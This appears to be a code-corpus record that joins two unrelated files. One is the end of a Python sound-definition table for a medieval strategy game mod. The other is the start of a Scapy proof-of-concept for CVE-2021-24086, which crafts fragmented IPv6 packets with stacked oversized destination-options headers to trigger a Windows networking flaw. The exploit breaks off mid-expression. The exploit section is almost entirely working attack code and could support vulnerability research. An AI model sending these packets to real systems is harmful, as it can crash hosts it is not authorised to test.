"Mediterranean_Heavy_Generic_Ladder_2.mp3","Mediterranean_Heavy_Generic_Ladder_1.mp3", "Mediterranean_General_Generic_Ladder_2.mp3","Mediterranean_General_Generic_Ladder_1.mp3"]), #("islam_ladder", sf_2d|sf_priority_10|sf_vol_8, ["Arabic_Light_Generic_Ladder_2.mp3","Arabic_Light_Generic_Ladder_1.mp3", "Arabic_Heavy_Generic_Ladder_2.mp3","Arabic_Heavy_Generic_Ladder_1.mp3", "Arabic_General_Generic_Ladder_2.mp3","Arabic_General_Generic_Ladder_1.mp3"]), #("german_ladder", sf_2d|sf_priority_10|sf_vol_8, ["German_Light_Generic_Ladder_2.mp3","German_Light_Generic_Ladder_1.mp3", "German_Heavy_Generic_Ladder_2.mp3","German_Heavy_Generic_Ladder_1.mp3", "German_General_Generic_Ladder_2.mp3","German_General_Generic_Ladder_1.mp3"]), #("eng_ladder", sf_2d|sf_priority_10|sf_vol_8, ["English_Light_Generic_Ladder_2.mp3","English_Light_Generic_Ladder_1.mp3", "English_Heavy_Generic_Ladder_2.mp3","English_Heavy_Generic_Ladder_1.mp3", "English_General_Generic_Ladder_2.mp3","English_General_Generic_Ladder_1.mp3"]), #("french_ladder", sf_2d|sf_priority_10|sf_vol_8, ["French_Light_Generic_Ladder_2.mp3","French_Light_Generic_Ladder_1.mp3", "French_Heavy_Generic_Ladder_2.mp3","French_Heavy_Generic_Ladder_1.mp3", "French_General_Generic_Ladder_2.mp3","French_General_Generic_Ladder_1.mp3"]), ##Towers #("eastern_tower", sf_2d|sf_priority_10|sf_vol_8, ["East_European_General_Generic_Tower_1.mp3","East_European_General_Generic_Tower_2.mp3", "East_European_Heavy_Generic_Tower_1.mp3","East_European_Heavy_Generic_Tower_2.mp3", "East_European_Light_Generic_Tower_1.mp3","East_European_Light_Generic_Tower_2.mp3"]), #("mongol_tower", sf_2d|sf_priority_10|sf_vol_8, ["1.mp3","2.mp3", "3.mp3","4.mp3", "5.mp3","6.mp3"]), #("scotland_tower", sf_2d|sf_priority_10|sf_vol_8, ["1.mp3","2.mp3", "3.mp3","4.mp3", "5.mp3","6.mp3"]), #("medi_tower", sf_2d|sf_priority_10|sf_vol_8, ["Mediterranean_General_Generic_Tower_1.mp3","Mediterranean_General_Generic_Tower_2.mp3", "Mediterranean_Heavy_Generic_Tower_1.mp3","Mediterranean_Heavy_Generic_Tower_2.mp3", "Mediterranean_Light_Generic_Tower_1.mp3","Mediterranean_Light_Generic_Tower_2.mp3"]), #("islam_tower", sf_2d|sf_priority_10|sf_vol_8, ["Arabic_General_Generic_Tower_1.mp3","Arabic_General_Generic_Tower_2.mp3", "Arabic_Heavy_Generic_Tower_1.mp3","Arabic_Heavy_Generic_Tower_2.mp3", "Arabic_Light_Generic_Tower_1.mp3","Arabic_Light_Generic_Tower_2.mp3"]), #("german_tower", sf_2d|sf_priority_10|sf_vol_8, ["German_General_Generic_Tower_1.mp3","German_General_Generic_Tower_2.mp3", "German_Heavy_Generic_Tower_1.mp3","German_Heavy_Generic_Tower_2.mp3", "German_Light_Generic_Tower_1.mp3","German_Light_Generic_Tower_2.mp3"]), #("eng_tower", sf_2d|sf_priority_10|sf_vol_8, ["English_General_Generic_Tower_1.mp3","English_General_Generic_Tower_2.mp3", "English_Heavy_Generic_Tower_1.mp3","English_Heavy_Generic_Tower_2.mp3", "English_Light_Generic_Tower_1.mp3","English_Light_Generic_Tower_2.mp3"]), #("french_tower", sf_2d|sf_priority_10|sf_vol_8, ["French_General_Generic_Tower_1.mp3","French_General_Generic_Tower_2.mp3", "French_Heavy_Generic_Tower_1.mp3","French_Heavy_Generic_Tower_2.mp3", "French_Light_Generic_Tower_1.mp3","French_Light_Generic_Tower_2.mp3"]), # ###In-battle ("eastern_all", sf_2d|sf_priority_10|sf_vol_8, ["East_European_General_Group_Select_1.wav","East_European_General_Group_Select_2.wav", "East_European_Heavy_Group_Select_1.wav", "East_European_Heavy_Group_Select_2.wav", "East_European_Light_Group_Select_1.wav", "East_European_Light_Group_Select_2.wav"]), ("eastern_inf", sf_2d|sf_priority_10|sf_vol_8, ["East_European_General_Group_Select_Infantry_1.wav","East_European_General_Group_Select_Infantry_2.wav", "East_European_Heavy_Group_Select_Infantry_1.wav","East_European_Heavy_Group_Select_Infantry_2.wav", "East_European_Light_Group_Select_Infantry_1.wav","East_European_Light_Group_Select_Infantry_2.wav"]), ("eastern_archers", sf_2d|sf_priority_10|sf_vol_8, ["East_European_General_Group_Select_Missiles_1.wav","East_European_General_Group_Select_Missiles_2.wav", "East_European_Heavy_Group_Select_Missiles_1.wav","East_European_Heavy_Group_Select_Missiles_2.wav", "East_European_Light_Group_Select_Missiles_1.wav","East_European_Light_Group_Select_Missiles_2.wav"]), ("eastern_cav", sf_2d|sf_priority_10|sf_vol_8, ["East_European_General_Group_Select_Cavalry_1.wav","East_European_General_Group_Select_Cavalry_2.wav", "East_European_Heavy_Group_Select_Cavalry_1.wav","East_European_Heavy_Group_Select_Cavalry_2.wav", "East_European_Light_Group_Select_Cavalry_1.wav","East_European_Light_Group_Select_Cavalry_2.wav"]), ("mongol_all", sf_2d|sf_priority_10|sf_vol_8, ["Mongolian_General_Group_Select_1.wav","Mongolian_General_Group_Select_2.wav", "Mongolian_Heavy_Group_Select_1.wav", "Mongolian_Heavy_Group_Select_2.wav", "Mongolian_Light_Group_Select_1.wav", "Mongolian_Light_Group_Select_2.wav"]), ("mongol_inf", sf_2d|sf_priority_10|sf_vol_8, ["Mongolian_General_Group_Select_Infantry_1.wav","Mongolian_General_Group_Select_Infantry_2.wav", "Mongolian_Heavy_Group_Select_Infantry_1.wav","Mongolian_Heavy_Group_Select_Infantry_2.wav", "Mongolian_Light_Group_Select_Infantry_1.wav","Mongolian_Light_Group_Select_Infantry_2.wav"]), ("mongol_archers", sf_2d|sf_priority_10|sf_vol_8, ["Mongolian_General_Group_Select_Missiles_1.wav","Mongolian_General_Group_Select_Missiles_2.wav", "Mongolian_Heavy_Group_Select_Missiles_1.wav","Mongolian_Heavy_Group_Select_Missiles_2.wav", "Mongolian_Light_Group_Select_Missiles_1.wav","Mongolian_Light_Group_Select_Missiles_2.wav"]), ("mongol_cav", sf_2d|sf_priority_10|sf_vol_8, ["Mongolian_General_Group_Select_Cavalry_1.wav","Mongolian_General_Group_Select_Cavalry_2.wav", "Mongolian_Heavy_Group_Select_Cavalry_1.wav","Mongolian_Heavy_Group_Select_Cavalry_2.wav", "Mongolian_Light_Group_Select_Cavalry_1.wav","Mongolian_Light_Group_Select_Cavalry_2.wav"]), ("scot_all", sf_2d|sf_priority_10|sf_vol_8, ["Scottish_General_Group_Select_1.wav","Scottish_General_Group_Select_2.wav", "Scottish_Heavy_Group_Select_1.wav", "Scottish_Heavy_Group_Select_2.wav", "Scottish_Light_Group_Select_1.wav", "Scottish_Light_Group_Select_2.wav"]), ("scot_inf", sf_2d|sf_priority_10|sf_vol_8, ["Scottish_General_Group_Select_Infantry_1.wav","Scottish_General_Group_Select_Infantry_2.wav", "Scottish_Heavy_Group_Select_Infantry_1.wav","Scottish_Heavy_Group_Select_Infantry_2.wav", "Scottish_Light_Group_Select_Infantry_1.wav","Scottish_Light_Group_Select_Infantry_2.wav"]), ("scot_archers", sf_2d|sf_priority_10|sf_vol_8, ["Scottish_General_Group_Select_Missiles_1.wav","Scottish_General_Group_Select_Missiles_2.wav", "Scottish_Heavy_Group_Select_Missiles_1.wav","Scottish_Heavy_Group_Select_Missiles_2.wav", "Scottish_Light_Group_Select_Missiles_1.wav","Scottish_Light_Group_Select_Missiles_2.wav"]), ("scot_cav", sf_2d|sf_priority_10|sf_vol_8, ["Scottish_General_Group_Select_Cavalry_1.wav","Scottish_General_Group_Select_Cavalry_2.wav", "Scottish_Heavy_Group_Select_Cavalry_1.wav","Scottish_Heavy_Group_Select_Cavalry_2.wav", "Scottish_Light_Group_Select_Cavalry_1.wav","Scottish_Light_Group_Select_Cavalry_2.wav"]), ("medi_all", sf_2d|sf_priority_10|sf_vol_8, ["Mediterranean_General_Group_Select_1.wav","Mediterranean_General_Group_Select_2.wav", "Mediterranean_Heavy_Group_Select_1.wav", "Mediterranean_Heavy_Group_Select_2.wav", "Mediterranean_Light_Group_Select_1.wav", "Mediterranean_Light_Group_Select_2.wav"]), ("medi_inf", sf_2d|sf_priority_10|sf_vol_8, ["Mediterranean_General_Group_Select_Infantry_1.wav","Mediterranean_General_Group_Select_Infantry_2.wav", "Mediterranean_Heavy_Group_Select_Infantry_1.wav","Mediterranean_Heavy_Group_Select_Infantry_2.wav", "Mediterranean_Light_Group_Select_Infantry_1.wav","Mediterranean_Light_Group_Select_Infantry_2.wav"]), ("medi_archers", sf_2d|sf_priority_10|sf_vol_8, ["Mediterranean_General_Group_Select_Missiles_1.wav","Mediterranean_General_Group_Select_Missiles_2.wav", "Mediterranean_Heavy_Group_Select_Missiles_1.wav","Mediterranean_Heavy_Group_Select_Missiles_2.wav", "Mediterranean_Light_Group_Select_Missiles_1.wav","Mediterranean_Light_Group_Select_Missiles_2.wav"]), ("medi_cav", sf_2d|sf_priority_10|sf_vol_8, ["Mediterranean_General_Group_Select_Cavalry_1.wav","Mediterranean_General_Group_Select_Cavalry_2.wav", "Mediterranean_Heavy_Group_Select_Cavalry_1.wav","Mediterranean_Heavy_Group_Select_Cavalry_2.wav", "Mediterranean_Light_Group_Select_Cavalry_1.wav","Mediterranean_Light_Group_Select_Cavalry_2.wav"]), ("islam_all", sf_2d|sf_priority_10|sf_vol_8, ["Arabic_General_Group_Select_1.wav","Arabic_Heavy_Group_Select_1.wav", "Arabic_General_Group_Select_2.wav", "Arabic_Heavy_Group_Select_2.wav", "Arabic_Light_Group_Select_2.wav", "Arabic_Light_Group_Select_1.wav"]), ("islam_inf", sf_2d|sf_priority_10|sf_vol_8, ["Arabic_General_Group_Select_Infantry_1.wav","Arabic_General_Group_Select_Infantry_2.wav", "Arabic_Heavy_Group_Select_Infantry_1.wav","Arabic_Heavy_Group_Select_Infantry_2.wav", "Arabic_Light_Group_Select_Infantry_1.wav","Arabic_Light_Group_Select_Infantry_2.wav"]), ("islam_archers", sf_2d|sf_priority_10|sf_vol_8, ["Arabic_General_Group_Select_Missiles_1.wav","Arabic_General_Group_Select_Missiles_2.wav", "Arabic_Heavy_Group_Select_Missiles_1.wav","Arabic_Heavy_Group_Select_Missiles_2.wav", "Arabic_Light_Group_Select_Missiles_1.wav","Arabic_Light_Group_Select_Missiles_2.wav"]), ("islam_cav", sf_2d|sf_priority_10|sf_vol_8, ["Arabic_General_Group_Select_Cavalry_1.wav","Arabic_General_Group_Select_Cavalry_2.wav", "Arabic_Heavy_Group_Select_Cavalry_1.wav","Arabic_Heavy_Group_Select_Cavalry_2.wav", "Arabic_Light_Group_Select_Cavalry_1.wav","Arabic_Light_Group_Select_Cavalry_2.wav"]), ("ger_all", sf_2d|sf_priority_10|sf_vol_8, ["German_General_Group_Select_1.wav","German_General_Group_Select_2.wav", "German_Heavy_Group_Select_1.wav", "German_Heavy_Group_Select_2.wav", "German_Light_Group_Select_1.wav", "German_Light_Group_Select_2.wav"]), ("ger_inf", sf_2d|sf_priority_10|sf_vol_8, ["German_General_Group_Select_Infantry_1.wav","German_General_Group_Select_Infantry_2.wav", "German_Heavy_Group_Select_Infantry_1.wav","German_Heavy_Group_Select_Infantry_2.wav", "German_Light_Group_Select_Infantry_1.wav","German_Light_Group_Select_Infantry_2.wav"]), ("ger_archers", sf_2d|sf_priority_10|sf_vol_8, ["German_General_Group_Select_Missiles_1.wav","German_General_Group_Select_Missiles_2.wav", "German_Heavy_Group_Select_Missiles_1.wav","German_Heavy_Group_Select_Missiles_2.wav", "German_Light_Group_Select_Missiles_1.wav","German_Light_Group_Select_Missiles_2.wav"]), ("ger_cav", sf_2d|sf_priority_10|sf_vol_8, ["German_General_Group_Select_Cavalry_1.wav","German_General_Group_Select_Cavalry_2.wav", "German_Heavy_Group_Select_Cavalry_1.wav","German_Heavy_Group_Select_Cavalry_2.wav", "German_Light_Group_Select_Cavalry_1.wav","German_Light_Group_Select_Cavalry_2.wav"]), ("eng_all", sf_2d|sf_priority_10|sf_vol_8, ["English_General_Group_Select_1.wav","English_General_Group_Select_2.wav", "English_Heavy_Group_Select_1.wav", "English_Heavy_Group_Select_2.wav", "English_Light_Group_Select_1.wav", "English_Light_Group_Select_2.wav"]), ("eng_inf", sf_2d|sf_priority_10|sf_vol_8, ["English_General_Group_Select_Infantry_1.wav","English_General_Group_Select_Infantry_2.wav", "English_Heavy_Group_Select_Infantry_1.wav","English_Heavy_Group_Select_Infantry_2.wav", "English_Light_Group_Select_Infantry_2.wav","English_Light_Group_Select_Infantry_1.wav"]), ("eng_archers", sf_2d|sf_priority_10|sf_vol_8, ["English_General_Group_Select_Missiles_1.wav","English_General_Group_Select_Missiles_2.wav", "English_Heavy_Group_Select_Missiles_1.wav","English_Heavy_Group_Select_Missiles_2.wav", "English_Light_Group_Select_Missiles_1.wav","English_Light_Group_Select_Missiles_2.wav"]), ("eng_cav", sf_2d|sf_priority_10|sf_vol_8, ["English_General_Group_Select_Cavalry_1.wav","English_General_Group_Select_Cavalry_2.wav", "English_Heavy_Group_Select_Cavalry_1.wav","English_Heavy_Group_Select_Cavalry_2.wav", "English_Light_Group_Select_Cavalry_1.wav","English_Light_Group_Select_Cavalry_2.wav"]), ("fre_all", sf_2d|sf_priority_10|sf_vol_8, ["French_General_Group_Select_1.wav","French_Heavy_Group_Select_1.wav", "French_General_Group_Select_2.wav", "French_Heavy_Group_Select_2.wav", "French_Light_Group_Select_1.wav", "French_Light_Group_Select_2.wav"]), ("fre_inf", sf_2d|sf_priority_10|sf_vol_8, ["French_General_Group_Select_Infantry_1.wav","French_General_Group_Select_Infantry_2.wav", "French_Heavy_Group_Select_Infantry_1.wav","French_Heavy_Group_Select_Infantry_2.wav", "French_Light_Group_Select_Infantry_1.wav","French_Light_Group_Select_Infantry_2.wav"]), ("fre_archers", sf_2d|sf_priority_10|sf_vol_8, ["French_General_Group_Select_Missiles_1.wav","French_General_Group_Select_Missiles_2.wav", "French_Heavy_Group_Select_Missiles_1.wav","French_Heavy_Group_Select_Missiles_2.wav", "French_Light_Group_Select_Missiles_1.wav","French_Light_Group_Select_Missiles_2.wav"]), ("fre_cav", sf_2d|sf_priority_10|sf_vol_8, ["French_General_Group_Select_Cavalry_1.wav","French_General_Group_Select_Cavalry_2.wav", "French_Heavy_Group_Select_Cavalry_1.wav","French_Heavy_Group_Select_Cavalry_2.wav", "French_Light_Group_Select_Cavalry_1.wav","French_Light_Group_Select_Cavalry_2.wav"]), #Allies defeated ("eastern_ally", sf_2d|sf_priority_10|sf_vol_8, ["East_European_Allied_General_Executed_2.mp3","East_European_Allied_General_Executed_1.mp3", "East_European_Allied_Army_Leader_Killed_2.mp3","East_European_Allied_Army_Leader_Killed_1.mp3"]), ("mongol_ally", sf_2d|sf_priority_10|sf_vol_8, ["Mongolian_Allied_General_Executed_2.mp3","Mongolian_Allied_General_Executed_1.mp3", "Mongolian_Allied_Army_Leader_Killed_2.mp3","Mongolian_Allied_Army_Leader_Killed_1.mp3"]), ("scotland_ally", sf_2d|sf_priority_10|sf_vol_8, ["Scottish_Allied_General_Executed_2.mp3","Scottish_Allied_General_Executed_1.mp3","Scottish_Allied_Army_Leader_Killed_2.mp3", "Scottish_Allied_Army_Leader_Killed_1.mp3"]), ("medi_ally", sf_2d|sf_priority_10|sf_vol_8, ["Mediterranean_Allied_General_Executed_2.mp3","Mediterranean_Allied_General_Executed_1.mp3", "Mediterranean_Allied_Army_Leader_Killed_2.mp3","Mediterranean_Allied_Army_Leader_Killed_1.mp3"]), ("islam_ally", sf_2d|sf_priority_10|sf_vol_8, ["Arabic_Allied_General_Executed_2.mp3","Arabic_Allied_General_Executed_1.mp3", "Arabic_Allied_Army_Leader_Killed_2.mp3","Arabic_Allied_Army_Leader_Killed_1.mp3"]), ("german_ally", sf_2d|sf_priority_10|sf_vol_8, ["German_Allied_General_Executed_2.mp3","German_Allied_General_Executed_1.mp3", "German_Allied_Army_Leader_Killed_2.mp3","German_Allied_Army_Leader_Killed_1.mp3"]), ("eng_ally", sf_2d|sf_priority_10|sf_vol_8, ["English_Allied_General_Executed_2.mp3","English_Allied_General_Executed_1.mp3", "English_Allied_Army_Leader_Killed_2.mp3","English_Allied_Army_Leader_Killed_1.mp3"]), ("french_ally", sf_2d|sf_priority_10|sf_vol_8, ["French_Allied_General_Executed_2.mp3","French_Allied_General_Executed_1.mp3", "French_Allied_Army_Leader_Killed_2.mp3","French_Allied_Army_Leader_Killed_1.mp3"]), #player faction defeated ("eastern_player", sf_2d|sf_priority_10|sf_vol_8, ["East_European_Player_General_Killed_2.mp3","East_European_Player_General_Killed_1.mp3", "East_European_Player_General_Executed_2.mp3","East_European_Player_General_Executed_1.mp3"]), ("mongol_player", sf_2d|sf_priority_10|sf_vol_8, ["Mongolian_Player_General_Killed_2.mp3","Mongolian_Player_General_Killed_1.mp3", "Mongolian_Player_General_Executed_2.mp3","Mongolian_Player_General_Executed_1.mp3"]), ("scotland_player", sf_2d|sf_priority_10|sf_vol_8, ["Scottish_Player_General_Killed_2.mp3","Scottish_Player_General_Killed_1.mp3","Scottish_Player_General_Executed_2.mp3", "Scottish_Player_General_Executed_1.mp3"]), ("medi_player", sf_2d|sf_priority_10|sf_vol_8, ["Mediterranean_Player_General_Killed_2.mp3","Mediterranean_Player_General_Killed_1.mp3", "Mediterranean_Player_General_Executed_2.mp3","Mediterranean_Player_General_Executed_1.mp3"]), ("islam_player", sf_2d|sf_priority_10|sf_vol_8, ["Arabic_Player_General_Killed_2.mp3","Arabic_Player_General_Killed_1.mp3", "Arabic_Player_General_Executed_2.mp3","Arabic_Player_General_Executed_1.mp3"]), ("german_player", sf_2d|sf_priority_10|sf_vol_8, ["German_Player_General_Killed_2.mp3","German_Player_General_Killed_1.mp3", "German_Player_General_Executed_2.mp3","German_Player_General_Executed_1.mp3"]), ("eng_player", sf_2d|sf_priority_10|sf_vol_8, ["English_Player_General_Killed_2.mp3","English_Player_General_Killed_1.mp3", "English_Player_General_Executed_2.mp3","English_Player_General_Executed_1.mp3"]), ("french_player", sf_2d|sf_priority_10|sf_vol_8, ["French_Player_General_Killed_2.mp3","French_Player_General_Killed_1.mp3", "French_Player_General_Executed_2.mp3","French_Player_General_Executed_1.mp3"]), ##Enemy slain by us aor allies ("eastern_enemy_beaten", sf_2d|sf_priority_10|sf_vol_8, ["East_European_Pagan_Enemy_General_Killed_2.mp3","East_European_Pagan_Enemy_General_Killed_1.mp3", "East_European_Enemy_General_Killed_2.mp3","East_European_Enemy_General_Killed_1.mp3"]), ("mongol_enemy_beaten", sf_2d|sf_priority_10|sf_vol_8, ["Mongolian_Enemy_General_Killed_2.mp3","Mongolian_Enemy_General_Killed_1.mp3", "Mongolian_Christian_Enemy_General_Killed_2.mp3","Mongolian_Christian_Enemy_General_Killed_1.mp3"]), ("scotland_enemy_beaten", sf_2d|sf_priority_10|sf_vol_8, ["Scottish_Pagan_Enemy_General_Killed_2.mp3","Scottish_Pagan_Enemy_General_Killed_1.mp3","Scottish_Enemy_General_Killed_2.mp3", "Scottish_Enemy_General_Killed_1.mp3"]), ("medi_enemy_beaten", sf_2d|sf_priority_10|sf_vol_8, ["Mediterranean_Pagan_Enemy_General_Killed_2.mp3","Mediterranean_Pagan_Enemy_General_Killed_1.mp3", "Mediterranean_Enemy_General_Killed_2.mp3","Mediterranean_Enemy_General_Killed_1.mp3"]), ("islam_enemy_beaten", sf_2d|sf_priority_10|sf_vol_8, ["Arabic_Pagan_Enemy_General_Killed_2.mp3","Arabic_Pagan_Enemy_General_Killed_1.mp3", "Arabic_Enemy_General_Killed_2.mp3","Arabic_Enemy_General_Killed_1.mp3", "Arabic_Christian_Enemy_General_Killed_2.mp3","Arabic_Christian_Enemy_General_Killed_1.mp3"]), ("german_enemy_beaten", sf_2d|sf_priority_10|sf_vol_8, ["German_Pagan_Enemy_General_Killed_2.mp3","German_Pagan_Enemy_General_Killed_1.mp3", "German_Enemy_General_Killed_2.mp3","German_Enemy_General_Killed_1.mp3"]), ("eng_enemy_beaten", sf_2d|sf_priority_10|sf_vol_8, ["English_Pagan_Enemy_General_Killed_2.mp3","English_Pagan_Enemy_General_Killed_1.mp3", "English_Enemy_General_Killed_2.mp3","English_Enemy_General_Killed_1.mp3"]), ("french_enemy_beaten", sf_2d|sf_priority_10|sf_vol_8, ["French_Pagan_Enemy_General_Killed_2.mp3","French_Pagan_Enemy_General_Killed_1.mp3", "French_Enemy_General_Killed_2.mp3","French_Enemy_General_Killed_1.mp3"]), #Muslims beaten ("eastern_enemy_beaten_muslim", sf_2d|sf_priority_10|sf_vol_8, ["East_European_Muslim_Enemy_General_Killed_1.mp3","East_European_Muslim_Enemy_General_Killed_2.mp3"]), ("mongol_enemy_beaten_muslim", sf_2d|sf_priority_10|sf_vol_8, ["Mongolian_Muslim_Enemy_General_Killed_1.mp3","Mongolian_Muslim_Enemy_General_Killed_2.mp3"]), ("scotland_enemy_beaten_muslim", sf_2d|sf_priority_10|sf_vol_8, ["Scottish_Muslim_Enemy_General_Killed_1.mp3","Scottish_Muslim_Enemy_General_Killed_2.mp3"]), ("medi_enemy_beaten_muslim", sf_2d|sf_priority_10|sf_vol_8, ["Mediterranean_Muslim_Enemy_General_Killed_1.mp3","Mediterranean_Muslim_Enemy_General_Killed_2.mp3"]), ("islam_enemy_beaten_muslim", sf_2d|sf_priority_10|sf_vol_8, ["Arabic_Player_General_Killed_2.mp3","Arabic_Player_General_Killed_1.mp3"]), ("german_enemy_beaten_muslim", sf_2d|sf_priority_10|sf_vol_8, ["German_Muslim_Enemy_General_Killed_1.mp3","German_Muslim_Enemy_General_Killed_2.mp3"]), ("eng_enemy_beaten_muslim", sf_2d|sf_priority_10|sf_vol_8, ["English_Muslim_Enemy_General_Killed_1.mp3","English_Muslim_Enemy_General_Killed_2.mp3"]), ("french_enemy_beaten_muslim", sf_2d|sf_priority_10|sf_vol_8, ["French_Muslim_Enemy_General_Killed_1.mp3","French_Muslim_Enemy_General_Killed_2.mp3"]), ##Our king slain ("eastern_our_leader", sf_2d|sf_priority_10|sf_vol_8, ["East_European_Player_Leader_Killed_2.mp3","East_European_Player_Leader_Killed_1.mp3"]), ("mongol_our_leader", sf_2d|sf_priority_10|sf_vol_8, ["Mongolian_Player_Leader_Killed_2.mp3","Mongolian_Player_Leader_Killed_1.mp3"]), ("scotland_our_leader", sf_2d|sf_priority_10|sf_vol_8, ["Scottish_Player_Leader_Killed_2.mp3","Scottish_Player_Leader_Killed_1.mp3"]), ("medi_our_leader", sf_2d|sf_priority_10|sf_vol_8, ["Mediterranean_Player_Leader_Killed_2.mp3","Mediterranean_Player_Leader_Killed_1.mp3"]), ("islam_our_leader", sf_2d|sf_priority_10|sf_vol_8, ["Arabic_Player_Leader_Killed_1.mp3"]), ("german_our_leader", sf_2d|sf_priority_10|sf_vol_8, ["German_Player_Leader_Killed_2.mp3","German_Player_Leader_Killed_1.mp3"]), ("eng_our_leader", sf_2d|sf_priority_10|sf_vol_8, ["English_Player_Leader_Killed_2.mp3","English_Player_Leader_Killed_1.mp3"]), ("french_our_leader", sf_2d|sf_priority_10|sf_vol_8, ["French_Player_Leader_Killed_2.mp3","French_Player_Leader_Killed_1.mp3"]), #Enemy king slain by us or allies ("eastern_enemy_leader_killed", sf_2d|sf_priority_10|sf_vol_8, ["East_European_Enemy_King_Killed_2.mp3","East_European_Enemy_King_Killed_1.mp3"]), ("mongol_enemy_leader_killed", sf_2d|sf_priority_10|sf_vol_8, ["Mongolian_Enemy_King_Killed_2.mp3","Mongolian_Enemy_King_Killed_1.mp3"]), ("scotland_enemy_leader_killed", sf_2d|sf_priority_10|sf_vol_8, ["Scottish_Enemy_King_Killed_2.mp3","Scottish_Enemy_King_Killed_1.mp3"]), ("medi_enemy_leader_killed", sf_2d|sf_priority_10|sf_vol_8, ["Mediterranean_Enemy_King_Killed_2.mp3","Mediterranean_Enemy_King_Killed_1.mp3"]), ("islam_enemy_leader_killed", sf_2d|sf_priority_10|sf_vol_8, ["Arabic_Enemy_King_Killed_2.mp3", "Arabic_Enemy_King_Killed_1.mp3"]), ("german_enemy_leader_killed", sf_2d|sf_priority_10|sf_vol_8, ["German_Enemy_King_Killed_2.mp3","German_Enemy_King_Killed_1.mp3"]), ("eng_enemy_leader_killed", sf_2d|sf_priority_10|sf_vol_8, ["English_Enemy_King_Killed_2.mp3","English_Enemy_King_Killed_1.mp3"]), ("french_enemy_leader_killed", sf_2d|sf_priority_10|sf_vol_8, ["French_Enemy_King_Killed_2.mp3","French_Enemy_King_Killed_1.mp3"]), ###("eastern_tower", sf_2d|sf_priority_10|sf_vol_8, ["1.mp3","2.mp3", "3.mp3","4.mp3", "5.mp3","6.mp3"]), ###("mongol_tower", sf_2d|sf_priority_10|sf_vol_8, ["1.mp3","2.mp3", "3.mp3","4.mp3", "5.mp3","6.mp3"]), ###("scotland_tower", sf_2d|sf_priority_10|sf_vol_8, ["1.mp3","2.mp3", "3.mp3","4.mp3", "5.mp3","6.mp3"]), ###("medi_tower", sf_2d|sf_priority_10|sf_vol_8, ["1.mp3","2.mp3", "3.mp3","4.mp3", "5.mp3","6.mp3"]), ###("islam_tower", sf_2d|sf_priority_10|sf_vol_8, ["1.mp3","2.mp3", "3.mp3","4.mp3", "5.mp3","6.mp3"]), ###("german_tower", sf_2d|sf_priority_10|sf_vol_8, ["1.mp3","2.mp3", "3.mp3","4.mp3", "5.mp3","6.mp3"]), ###("eng_tower", sf_2d|sf_priority_10|sf_vol_8, ["1.mp3","2.mp3", "3.mp3","4.mp3", "5.mp3","6.mp3"]), ###("french_tower", sf_2d|sf_priority_10|sf_vol_8, ["1.mp3","2.mp3", "3.mp3","4.mp3", "5.mp3","6.mp3"]), #####Cultural Speeches end ]

217.346698

1,383

0.848277

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0.774066

0.69764

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184,310

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1

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1

0

1

null

0

7

5ae561d338865d7b45a4996dfc53d80cdfc032e0

13,478

py

Python

cve-2021-24086.py

lisinan988/CVE-2021-24086

0657d1dde91f46c23f0d080f98a635a32edf7681

[ "MIT" ]

205

2021-04-07T12:58:06.000Z

2022-03-05T18:35:40.000Z

cve-2021-24086.py

lisinan988/CVE-2021-24086

0657d1dde91f46c23f0d080f98a635a32edf7681

[ "MIT" ]

2

2021-04-10T02:39:57.000Z

2021-06-02T00:26:43.000Z

cve-2021-24086.py

lisinan988/CVE-2021-24086

0657d1dde91f46c23f0d080f98a635a32edf7681

[ "MIT" ]

46

2021-04-07T14:22:50.000Z

2022-03-02T14:57:42.000Z

# Axel '0vercl0k' Souchet - April 7 2021 from scapy.all import * import argparse def frag6(target, frag_id, bytes, nh, frag_size = 1008): '''Ghetto fragmentation.''' assert (frag_size % 8) == 0 leftover = bytes offset = 0 frags = [] while len(leftover) > 0: chunk = leftover[: frag_size] leftover = leftover[len(chunk): ] last_pkt = len(leftover) == 0 # 0 -> No more / 1 -> More m = 0 if last_pkt else 1 assert offset < 8191 pkt = Ether() \ / IPv6(dst = target) \ / IPv6ExtHdrFragment(m = m, nh = nh, id = frag_id, offset = offset) \ / chunk offset += (len(chunk) // 8) frags.append(pkt) return frags def pull_the_trigger(args): '''Trigger CVE-2021-24086 patched in REL2102.''' frag_id = random.randint(0, 0xffffffff) second_pkt_id = (~frag_id & 0xffffffff) reassembled_pkt = IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / IPv6ExtHdrDestOpt(options = [ PadN(optdata=('a'*0xff)), PadN(optdata=('b'*0xff)), PadN(optdata=('c'*0xff)), PadN(optdata=('d'*0xff)), PadN(optdata=('e'*0xff)), PadN(optdata=('f'*0xff)), PadN(optdata=('0'*0xff)), ]) \ / 